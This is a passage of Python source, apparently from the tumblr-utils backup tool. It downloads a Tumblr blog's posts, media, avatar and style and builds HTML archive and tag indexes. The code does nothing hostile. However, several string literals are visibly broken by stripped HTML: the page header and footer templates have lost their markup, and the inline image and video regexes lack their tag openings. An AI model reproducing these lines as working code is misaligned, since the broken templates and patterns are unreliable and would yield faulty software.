old avatar, if present\n avatar_glob = glob(join(prev_archive, theme_dir, avatar_base + '.*'))\n if avatar_glob:\n src = avatar_glob[0]\n path_parts = (theme_dir, split(src)[-1])\n cpy_res = maybe_copy_media(prev_archive, path_parts)\n if cpy_res:\n return # We got the avatar\n\n url = 'https://api.tumblr.com/v2/blog/%s/avatar' % blog_name\n avatar_dest = avatar_fpath = open_file(lambda f: f, (theme_dir, avatar_base))\n\n # Remove old avatars\n if glob(join(theme_dir, avatar_base + '.*')):\n return # Do not clobber\n\n def adj_bn(old_bn, f):\n # Give it an extension\n image_type = imghdr.what(f)\n if image_type:\n return avatar_fpath + '.' + image_type\n return avatar_fpath\n\n # Download the image\n assert wget_retrieve is not None\n try:\n wget_retrieve(url, avatar_dest, adjust_basename=adj_bn)\n except WGError as e:\n e.log()\n\n\ndef get_style(prev_archive):\n \"\"\"Get the blog's CSS by brute-forcing it from the home page.\n The v2 API has no method for getting the style directly.\n See https://groups.google.com/d/msg/tumblr-api/f-rRH6gOb6w/sAXZIeYx5AUJ\"\"\"\n if prev_archive is not None:\n # Copy old style, if present\n path_parts = (theme_dir, 'style.css')\n cpy_res = maybe_copy_media(prev_archive, path_parts)\n if cpy_res:\n return # We got the style\n\n url = 'https://%s/' % blog_name\n try:\n resp = urlopen(url)\n page_data = resp.data\n except HTTPError as e:\n logger.error('URL is {}\\nError retrieving style: {}\\n'.format(url, e))\n return\n for match in re.findall(br'(?s)<style type=.text/css.>(.*?)</style>', page_data):\n css = match.strip().decode('utf-8', errors='replace')\n if '\\n' not in css:\n continue\n css = css.replace('\\r', '').replace('\\n ', '\\n')\n with open_text(theme_dir, 'style.css') as f:\n f.write(css + '\\n')\n return\n\n\n# Copy media file, if present in prev_archive\ndef maybe_copy_media(prev_archive, path_parts):\n if prev_archive is None:\n return False # Source does not exist\n\n srcpath = join(prev_archive, *path_parts)\n dstpath = open_file(lambda f: f, path_parts)\n\n if PY3:\n try:\n srcf = io.open(srcpath, 'rb')\n except EnvironmentError as e:\n if getattr(e, 'errno', None) not in (errno.ENOENT, errno.EISDIR):\n raise\n return False # Source does not exist (Python 3)\n else:\n srcf = nullcontext()\n\n with srcf:\n if PY3:\n src = srcf.fileno() # pytype: disable=attribute-error\n def dup(fd): return os.dup(fd)\n else:\n src = srcpath\n def dup(fd): return fd\n\n try:\n src_st = os.stat(src)\n except EnvironmentError as e:\n if getattr(e, 'errno', None) not in (errno.ENOENT, errno.EISDIR):\n raise\n return False # Source does not exist (Python 2)\n\n try:\n dst_st = os.stat(dstpath) # type: Optional[os.stat_result]\n except EnvironmentError as e:\n if getattr(e, 'errno', None) != errno.ENOENT:\n raise\n dst_st = None # Destination does not exist yet\n\n # Do not overwrite if destination is no newer and has the same size\n if (dst_st is None\n or dst_st.st_mtime > src_st.st_mtime\n or dst_st.st_size != src_st.st_size\n ):\n # dup src because open() takes ownership and closes it\n shutil.copyfile(dup(src), dstpath)\n shutil.copystat(src, dstpath) # type: ignore[arg-type]\n\n return True # Either we copied it or we didn't need to\n\n\ndef naturaldelta(delta):\n \"\"\"Format a duration of at least one day approximately.\"\"\"\n days = delta.days\n years, days = divmod(days, 365)\n months = int(days // 30.436875)\n\n def pl(s, n):\n return s if n == 1 else '{}s'.format(s)\n\n mstr = '{} {}'.format(months, pl('month', months)) if months else None # N months\n\n if years:\n msg = '{} {}'.format(years, pl('year', years)) # N years\n return '{}, {}'.format(msg, mstr) if mstr else msg\n\n return mstr if mstr else '{} {}'.format(days, pl('day', days)) # N days\n\n\nclass Index(object):\n def __init__(self, blog, body_class='index'):\n self.blog = blog\n self.body_class = body_class\n self.index = defaultdict(lambda: defaultdict(list)) # type: DefaultDict[int, DefaultDict[int, List[LocalPost]]]\n\n def add_post(self, post):\n self.index[post.tm.tm_year][post.tm.tm_mon].append(post)\n\n def save_index(self, index_dir='.', title=None):\n archives = sorted(((y, m) for y in self.index for m in self.index[y]),\n reverse=options.reverse_month\n )\n subtitle = self.blog.title if title else self.blog.subtitle\n title = title or self.blog.title\n with open_text(index_dir, dir_index) as idx:\n idx.write(self.blog.header(title, self.body_class, subtitle, avatar=True))\n if options.tag_index and self.body_class == 'index':\n idx.write('<p><a href={}>Tag index</a></p>\\n'.format(\n urlpathjoin(tag_index_dir, dir_index)\n ))\n for year in sorted(self.index.keys(), reverse=options.reverse_index):\n self.save_year(idx, archives, index_dir, year)\n idx.write(u'<footer><p>Generated on %s by <a href=https://github.com/'\n 'bbolli/tumblr-utils>tumblr-utils</a>.</p></footer>\\n' % strftime('%x %X')\n )\n\n def save_year(self, idx, archives, index_dir, year):\n idx.write(u'<h3>%s</h3>\\n<ul>\\n' % year)\n for month in sorted(self.index[year].keys(), reverse=options.reverse_index):\n tm = time.localtime(time.mktime((year, month, 3, 0, 0, 0, 0, 0, -1)))\n month_name = self.save_month(archives, index_dir, year, month, tm)\n idx.write(u' <li><a href={} title=\"{} post(s)\">{}</a></li>\\n'.format(\n urlpathjoin(archive_dir, month_name), len(self.index[year][month]), strftime('%B', tm)\n ))\n idx.write(u'</ul>\\n\\n')\n\n def save_month(self, archives, index_dir, year, month, tm):\n posts = sorted(self.index[year][month], key=lambda x: x.date, reverse=options.reverse_month)\n posts_month = len(posts)\n posts_page = options.posts_per_page if options.posts_per_page >= 1 else posts_month\n\n def pages_per_month(y, m):\n posts_m = len(self.index[y][m])\n return posts_m // posts_page + bool(posts_m % posts_page)\n\n def next_month(inc):\n i = archives.index((year, month))\n i += inc\n if 0 <= i < len(archives):\n return archives[i]\n return 0, 0\n\n FILE_FMT = '%d-%02d-p%s%s'\n pages_month = pages_per_month(year, month)\n first_file = None # type: Optional[str]\n for page, start in enumerate(xrange(0, posts_month, posts_page), start=1):\n\n archive = [self.blog.header(strftime('%B %Y', tm), body_class='archive')]\n archive.extend(p.get_post(self.body_class == 'tag-archive') for p in posts[start:start + posts_page])\n\n suffix = '/' if options.dirs else post_ext\n file_name = FILE_FMT % (year, month, page, suffix)\n if options.dirs:\n base = urlpathjoin(save_dir, archive_dir)\n arch = open_text(index_dir, archive_dir, file_name, dir_index)\n else:\n base = ''\n arch = open_text(index_dir, archive_dir, file_name)\n\n if page > 1:\n pp = FILE_FMT % (year, month, page - 1, suffix)\n else:\n py, pm = next_month(-1)\n pp = FILE_FMT % (py, pm, pages_per_month(py, pm), suffix) if py else ''\n first_file = file_name\n\n if page < pages_month:\n np = FILE_FMT % (year, month, page + 1, suffix)\n else:\n ny, nm = next_month(+1)\n np = FILE_FMT % (ny, nm, 1, suffix) if ny else ''\n\n archive.append(self.blog.footer(base, pp, np))\n\n arch.write('\\n'.join(archive))\n\n assert first_file is not None\n return first_file\n\n\nclass TagIndex(Index):\n def __init__(self, blog, name):\n super(TagIndex, self).__init__(blog, 'tag-archive')\n self.name = name\n\n\nclass Indices(object):\n def __init__(self, blog):\n self.blog = blog\n self.main_index = Index(blog)\n self.tags = {}\n\n def build_index(self):\n filter_ = join('*', dir_index) if options.dirs else '*' + post_ext\n for post in (LocalPost(f) for f in glob(path_to(post_dir, filter_))):\n self.main_index.add_post(post)\n if options.tag_index:\n for tag, name in post.tags:\n if tag not in self.tags:\n self.tags[tag] = TagIndex(self.blog, name)\n self.tags[tag].name = name\n self.tags[tag].add_post(post)\n\n def save_index(self):\n self.main_index.save_index()\n if options.tag_index:\n self.save_tag_index()\n\n def save_tag_index(self):\n global save_dir\n save_dir = '../../..'\n mkdir(path_to(tag_index_dir))\n tag_index = [self.blog.header('Tag index', 'tag-index', self.blog.title, avatar=True), '<ul>']\n for tag, index in sorted(self.tags.items(), key=lambda kv: kv[1].name):\n digest = hashlib.md5(to_bytes(tag)).hexdigest()\n index.save_index(tag_index_dir + os.sep + digest,\n u\"Tag ‛%s’\" % index.name\n )\n tag_index.append(u' <li><a href={}>{}</a></li>'.format(\n urlpathjoin(digest, dir_index), escape(index.name)\n ))\n tag_index.extend(['</ul>', ''])\n with open_text(tag_index_dir, dir_index) as f:\n f.write(u'\\n'.join(tag_index))\n\n\nclass TumblrBackup(object):\n def __init__(self):\n self.failed_blogs = []\n self.total_count = 0\n self.post_count = 0\n self.filter_skipped = 0\n self.title = None # type: Optional[Text]\n self.subtitle = None # type: Optional[str]\n\n def exit_code(self):\n if self.failed_blogs:\n return EXIT_ERRORS\n if self.total_count == 0:\n return EXIT_NOPOSTS\n return EXIT_SUCCESS\n\n def header(self, title='', body_class='', subtitle='', avatar=False):\n root_rel = {\n 'index': '', 'tag-index': '..', 'tag-archive': '../..'\n }.get(body_class, save_dir)\n css_rel = urlpathjoin(root_rel, custom_css if have_custom_css else backup_css)\n if body_class:\n body_class = ' class=' + body_class\n h = u'''<!DOCTYPE html>\n\n<meta charset=%s>\n<title>%s\n\n\n\n\n
\n''' % (FILE_ENCODING, self.title, css_rel, body_class)\n if avatar:\n f = glob(path_to(theme_dir, avatar_base + '.*'))\n if f:\n h += 'Avatar\\n'.format(urlpathjoin(root_rel, theme_dir, split(f[0])[1]))\n if title:\n h += u'

%s

\\n' % title\n if subtitle:\n h += u'

%s

\\n' % subtitle\n h += '
\\n'\n return h\n\n @staticmethod\n def footer(base, previous_page, next_page):\n f = '
\\n'\n return f\n\n @staticmethod\n def get_post_timestamps(posts):\n for post in posts:\n with io.open(post, encoding=FILE_ENCODING) as pf:\n soup = BeautifulSoup(pf, 'lxml')\n postdate = soup.find('time')['datetime']\n del soup\n # No datetime.fromisoformat or datetime.timestamp on Python 2\n yield (datetime.strptime(postdate, '%Y-%m-%dT%H:%M:%SZ') - datetime(1970, 1, 1)) // timedelta(seconds=1)\n\n def backup(self, account, prev_archive):\n \"\"\"makes single files and an index for every post on a public Tumblr blog account\"\"\"\n\n base = get_api_url(account)\n\n # make sure there are folders to save in\n global save_folder, media_folder, post_ext, post_dir, save_dir, have_custom_css\n if options.blosxom:\n save_folder = root_folder\n post_ext = '.txt'\n post_dir = os.curdir\n post_class = BlosxomPost # type: Type[TumblrPost]\n else:\n save_folder = join(root_folder, options.outdir or account)\n media_folder = path_to(media_dir)\n if options.dirs:\n post_ext = ''\n save_dir = '../..'\n mkdir(path_to(post_dir), recursive=True)\n else:\n mkdir(save_folder, recursive=True)\n post_class = TumblrPost\n have_custom_css = os.access(path_to(custom_css), os.R_OK)\n\n self.post_count = 0\n self.filter_skipped = 0\n\n # get the highest post id already saved\n ident_max = None\n if options.incremental:\n filter_ = join('*', dir_index) if options.dirs else '*' + post_ext\n post_glob = glob(path_to(post_dir, filter_))\n if not post_glob:\n pass # No posts to read\n elif options.likes:\n # Read every post to find the newest timestamp we've saved.\n if BeautifulSoup is None:\n raise RuntimeError(\"Incremental likes backup: module 'bs4' is not installed\")\n logger.warn('Finding newest liked post (may take a while)\\n', account=True)\n ident_max = max(self.get_post_timestamps(post_glob))\n else:\n ident_max = max(long(splitext(split(f)[1])[0]) for f in post_glob)\n if ident_max is not None:\n logger.info('Backing up posts after {}\\n'.format(ident_max), account=True)\n\n logger.status('Getting basic information\\r')\n\n api_parser = ApiParser(base, account)\n if prev_archive:\n api_parser.read_archive(prev_archive)\n resp = api_parser.apiparse(1)\n if not resp:\n self.failed_blogs.append(account)\n return\n\n # collect all the meta information\n if options.likes:\n if not resp.get('blog', {}).get('share_likes', True):\n logger.error('{} does not have public likes\\n'.format(account))\n self.failed_blogs.append(account)\n return\n posts_key = 'liked_posts'\n blog = {}\n count_estimate = resp['liked_count']\n else:\n posts_key = 'posts'\n blog = resp.get('blog', {})\n count_estimate = blog.get('posts')\n self.title = escape(blog.get('title', account))\n self.subtitle = blog.get('description', '')\n\n # use the meta information to create a HTML header\n TumblrPost.post_header = self.header(body_class='post')\n\n # start the thread pool\n backup_pool = ThreadPool()\n\n oldest_date = None\n\n # returns whether any posts from this batch were saved\n def _backup(posts, post_respfiles):\n def sort_key(x): return x[0]['liked_timestamp'] if options.likes else long(x[0]['id'])\n sorted_posts = sorted(zip(posts, post_respfiles), key=sort_key, reverse=True)\n for p, prf in sorted_posts:\n no_internet.check()\n post = post_class(p, account, prf, prev_archive)\n oldest_date = post.date\n if ident_max is None:\n pass # No limit\n elif (p['liked_timestamp'] if options.likes else long(post.ident)) <= ident_max:\n logger.info('Stopping backup: Incremental backup complete\\n', account=True)\n return False, oldest_date\n if options.period:\n if post.date > options.p_stop:\n raise RuntimeError('Found post with date ({}) newer than before param ({})'.format(\n post.date, options.p_stop))\n if post.date < options.p_start:\n logger.info('Stopping backup: Reached end of period\\n', account=True)\n return False, oldest_date\n if options.request:\n if post.typ not in options.request:\n continue\n tags = options.request[post.typ]\n if not (TAG_ANY in tags or tags & post.tags_lower):\n continue\n if options.no_reblog:\n if 'reblogged_from_name' in p or 'reblogged_root_name' in p:\n if 'trail' in p and not p['trail']:\n continue\n if 'trail' in p and 'is_current_item' not in p['trail'][-1]:\n continue\n elif 'trail' in p and p['trail'] and 'is_current_item' not in p['trail'][-1]:\n continue\n if os.path.exists(path_to(*post.get_path())) and options.no_post_clobber:\n continue # Post exists and no-clobber enabled\n if options.filter and not options.filter.input(p).first():\n self.filter_skipped += 1\n continue\n\n while True:\n try:\n backup_pool.add_work(post.save_content, timeout=0.1)\n break\n except queue.Full:\n pass\n no_internet.check()\n\n self.post_count += 1\n if options.count and self.post_count >= options.count:\n logger.info('Stopping backup: Reached limit of {} posts\\n'.format(options.count), account=True)\n return False, oldest_date\n return True, oldest_date\n\n try:\n # Get the JSON entries from the API, which we can only do for MAX_POSTS posts at once.\n # Posts \"arrive\" in reverse chronological order. Post #0 is the most recent one.\n i = options.skip\n before = options.p_stop if options.period else None\n while True:\n # find the upper bound\n logger.status('Getting {}posts {} to {}{}\\r'.format(\n 'liked ' if options.likes else '', i, i + MAX_POSTS - 1,\n '' if count_estimate is None else ' (of {} expected)'.format(count_estimate),\n ))\n\n resp = api_parser.apiparse(MAX_POSTS, i, before)\n if resp is None:\n self.failed_blogs.append(account)\n break\n\n posts = resp[posts_key]\n if not posts:\n logger.info('Backup complete: Found empty set of posts\\n', account=True)\n break\n\n post_respfiles = resp.get('post_respfiles')\n if post_respfiles is None:\n post_respfiles = [None for _ in posts]\n res, oldest_date = _backup(posts, post_respfiles)\n if not res:\n break\n\n if options.likes:\n next_ = resp['_links'].get('next')\n if next_ is None:\n logger.info('Backup complete: Found end of likes\\n', account=True)\n break\n before = int(next_['query_params']['before'])\n elif before is not None:\n assert oldest_date <= before\n if oldest_date == before:\n oldest_date -= 1\n before = oldest_date\n i += MAX_POSTS\n except:\n # ensure proper thread pool termination\n backup_pool.cancel()\n raise\n\n # wait until all posts have been saved\n backup_pool.wait()\n\n # postprocessing\n if not options.blosxom and (self.post_count or options.count == 0):\n logger.status('Getting avatar and style\\r')\n get_avatar(prev_archive)\n get_style(prev_archive)\n if not have_custom_css:\n save_style()\n logger.status('Building index\\r')\n ix = Indices(self)\n ix.build_index()\n ix.save_index()\n\n logger.status(None)\n skipped_msg = (', {} did not match filter'.format(self.filter_skipped)) if self.filter_skipped else ''\n logger.warn(\n '{} {}posts backed up{}\\n'.format(self.post_count, 'liked ' if options.likes else '', skipped_msg),\n account=True,\n )\n self.total_count += self.post_count\n\n\nclass TumblrPost(object):\n post_header = '' # set by TumblrBackup.backup()\n\n def __init__(self, post, backup_account, respfile, prev_archive):\n # type: (JSONDict, str, Text, Text) -> None\n self.content = ''\n self.post = post\n self.backup_account = backup_account\n self.respfile = respfile\n self.prev_archive = prev_archive\n self.creator = post.get('blog_name') or post['tumblelog']\n self.ident = str(post['id'])\n self.url = post['post_url']\n self.shorturl = post['short_url']\n self.typ = str(post['type'])\n self.date = post['liked_timestamp' if options.likes else 'timestamp'] # type: float\n self.isodate = datetime.utcfromtimestamp(self.date).isoformat() + 'Z'\n self.tm = time.localtime(self.date)\n self.title = u''\n self.tags = post['tags']\n self.note_count = post.get('note_count')\n if self.note_count is None:\n self.note_count = post.get('notes', {}).get('count')\n if self.note_count is None:\n self.note_count = 0\n self.reblogged_from = post.get('reblogged_from_url')\n self.reblogged_root = post.get('reblogged_root_url')\n self.source_title = post.get('source_title', '')\n self.source_url = post.get('source_url', '')\n self.tags_lower = None # type: Optional[Set[str]]\n if options.request:\n self.tags_lower = {t.lower() for t in self.tags}\n self.file_name = join(self.ident, dir_index) if options.dirs else self.ident + post_ext\n self.llink = self.ident if options.dirs else self.file_name\n self.media_dir = join(post_dir, self.ident) if options.dirs else media_dir\n self.media_url = urlpathjoin(save_dir, self.media_dir)\n self.media_folder = path_to(self.media_dir)\n\n def save_content(self):\n \"\"\"generates the content for this post\"\"\"\n post = self.post\n content = []\n\n def append(s, fmt=u'%s'):\n content.append(fmt % s)\n\n def get_try(elt):\n return post.get(elt, '')\n\n def append_try(elt, fmt=u'%s'):\n elt = get_try(elt)\n if elt:\n if options.save_images:\n elt = re.sub(r'''(?i)(]*\\s)?src\\s*=\\s*[\"'])(.*?)([\"'][^>]*>)''',\n self.get_inline_image, elt\n )\n if options.save_video or options.save_video_tumblr:\n # Handle video element poster attribute\n elt = re.sub(r'''(?i)(]*\\s)?poster\\s*=\\s*[\"'])(.*?)([\"'][^>]*>)''',\n self.get_inline_video_poster, elt\n )\n # Handle video element's source sub-element's src attribute\n elt = re.sub(r'''(?i)(]*\\s)?src\\s*=\\s*[\"'])(.*?)([\"'][^>]*>)''',\n self.get_inline_video, elt\n )\n append(elt, fmt)\n\n if self.typ == 'text':\n self.title = get_try('title')\n append_try('body')\n\n elif self.typ == 'photo':\n url = get_try('link_url')\n is_photoset = len(post['photos']) > 1\n for offset, p in enumerate(post['photos'], start=1):\n o = p['alt_sizes'][0] if 'alt_sizes' in p else p['original_size']\n src = o['url']\n if options.save_images:\n src = self.get_image_url(src, offset if is_photoset else 0)\n append(escape(src), u'\"\"')\n if url:\n content[-1] = u'%s' % (escape(url), content[-1])\n content[-1] = '

' + content[-1] + '

'\n if p['caption']:\n append(p['caption'], u'

%s

')\n append_try('caption')\n\n elif self.typ == 'link':\n url = post['url']\n self.title = u'%s' % (escape(url), post['title'] or url)\n append_try('description')\n\n elif self.typ == 'quote':\n append(post['text'], u'

%s

')\n append_try('source', u'

%s

')\n\n elif self.typ == 'video':\n src = ''\n if (options.save_video or options.save_video_tumblr) \\\n and post['video_type'] == 'tumblr':\n src = self.get_media_url(post['video_url'], '.mp4')\n elif options.save_video:\n src = self.get_youtube_url(self.url)\n if not src:\n logger.warn('Unable to download video in post #{}\\n'.format(self.ident))\n if src:\n append(u'

' % (\n src, \"Your browser does not support the video element.\", src, \"Video file\"\n ))\n else:\n player = get_try('player')\n if player:\n append(player[-1]['embed_code'])\n else:\n append_try('video_url')\n append_try('caption')\n\n elif self.typ == 'audio':\n def make_player(src_):\n append(u'

'\n .format('Your browser does not support the audio element.', 'Audio file', src=src_))\n\n src = None\n audio_url = get_try('audio_url') or get_try('audio_source_url')\n if options.save_audio:\n if post['audio_type'] == 'tumblr':\n if audio_url.startswith('https://a.tumblr.com/'):\n src = self.get_media_url(audio_url, '.mp3')\n elif audio_url.startswith('https://www.tumblr.com/audio_file/'):\n audio_url = u'https://a.tumblr.com/{}o1.mp3'.format(urlbasename(urlparse(audio_url).path))\n src = self.get_media_url(audio_url, '.mp3')\n elif post['audio_type'] == 'soundcloud':\n src = self.get_media_url(audio_url, '.mp3')\n player = get_try('player')\n if src:\n make_player(src)\n elif player:\n append(player)\n elif audio_url:\n make_player(audio_url)\n append_try('caption')\n\n elif self.typ == 'answer':\n self.title = post['question']\n append_try('answer')\n\n elif self.typ == 'chat':\n self.title = get_try('title')\n append(\n u'
\\n'.join('%(label)s %(phrase)s' % d for d in post['dialogue']),\n u'

%s

'\n )\n\n else:\n logger.warn(u\"Unknown post type '{}' in post #{}\\n\".format(self.typ, self.ident))\n append(escape(self.get_json_content()), u'
%s
')\n\n self.content = '\\n'.join(content)\n\n # fix wrongly nested HTML elements\n for p in ('

(<(%s)>)', '()

'):\n self.content = re.sub(p % 'p|ol|iframe[^>]*', r'\\1', self.content)\n\n self.save_post()\n\n def get_youtube_url(self, youtube_url):\n # determine the media file name\n filetmpl = u'%(id)s_%(uploader_id)s_%(title)s.%(ext)s'\n ydl_options = {\n 'outtmpl': join(self.media_folder, filetmpl),\n 'quiet': True,\n 'restrictfilenames': True,\n 'noplaylist': True,\n 'continuedl': True,\n 'nooverwrites': True,\n 'retries': 3000,\n 'fragment_retries': 3000,\n 'ignoreerrors': True,\n }\n if options.cookiefile is not None:\n ydl_options['cookiefile'] = options.cookiefile\n ydl = youtube_dl.YoutubeDL(ydl_options)\n ydl.add_default_info_extractors()\n try:\n result = ydl.extract_info(youtube_url, download=False)\n media_filename = youtube_dl.utils.sanitize_filename(filetmpl % result['entries'][0], restricted=True)\n except Exception:\n return ''\n\n # check if a file with this name already exists\n if not os.path.isfile(media_filename):\n try:\n ydl.extract_info(youtube_url, download=True)\n except Exception:\n return ''\n return urlpathjoin(self.media_url, split(media_filename)[1])\n\n def get_media_url(self, media_url, extension):\n if not media_url:\n return ''\n media_filename = self.get_filename(media_url)\n media_filename = urlsplitext(media_filename)[0] + extension\n saved_name = self.download_media(media_url, media_filename)\n if saved_name is not None:\n return urlpathjoin(self.media_url, saved_name)\n return media_url\n\n def get_image_url(self, image_url, offset):\n \"\"\"Saves an image if not saved yet. Returns the new URL or\n the original URL in case of download errors.\"\"\"\n image_filename = self.get_filename(image_url, '_o%s' % offset if offset else '')\n saved_name = self.download_media(image_url, image_filename)\n if saved_name is not None:\n if options.exif and saved_name.endswith('.jpg'):\n add_exif(join(self.media_folder, saved_name), set(self.tags))\n return urlpathjoin(self.media_url, saved_name)\n return image_url\n\n @staticmethod\n def maxsize_image_url(image_url):\n if \".tumblr.com/\" not in image_url or image_url.endswith('.gif'):\n return image_url\n # change the image resolution to 1280\n return re.sub(r'_\\d{2,4}(\\.\\w+)$', r'_1280\\1', image_url)\n\n def get_inline_image(self, match):\n \"\"\"Saves an inline image if not saved yet. Returns the new tag or\n the original one in case of download errors.\"\"\"\n image_url, image_filename = self._parse_url_match(match, transform=self.maxsize_image_url)\n if not image_filename or not image_url.startswith('http'):\n return match.group(0)\n saved_name = self.download_media(image_url, image_filename)\n if saved_name is None:\n return match.group(0)\n return u'%s%s/%s%s' % (match.group(1), self.media_url,\n saved_name, match.group(3)\n )\n\n def get_inline_video_poster(self, match):\n \"\"\"Saves an inline video poster if not saved yet. Returns the new\n